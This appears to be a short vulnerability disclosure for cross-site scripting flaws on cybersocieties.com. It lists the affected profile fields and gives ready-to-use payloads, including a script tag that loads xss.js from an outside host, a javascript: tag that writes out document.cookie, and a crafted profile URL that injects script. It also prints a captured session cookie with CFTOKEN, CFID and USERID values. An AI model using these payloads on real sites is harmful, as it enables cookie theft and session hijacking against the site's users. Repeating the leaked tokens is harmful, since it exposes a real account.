Cybersocieties.com
Homepage: http://www.cybersocieties.com Effected files: * Input boxes in profile: - Full name box - Occupation box - MSN box - Yahoo box - AIM Box * Viewing a profile ------------------------------------------------------ XSS vuln via input boxes in profile: No filter evasion is needed. For PoC try putting the following codesin one of theboxes mentioned above: <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> or: <IMG SRC=javascript:alert('XSS')> or: <IMG SRC="javascript:document.write(document.cookie)"> etc Screenshots: http://www.youfucktard.com/xsp/cyberso1.jpg http://www.youfucktard.com/xsp/cyberso2.jpg http://www.youfucktard.com/xsp/cyberso3.jpg Our Cookie: This is remote text via xss.js located at youfucktard.com CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506 -------------------------------------------------------- Viewing a profile XSS vuln PoC: http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3";>">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<' Screenshot: http://www.youfucktard.com/xsp/cyberso4.jpg
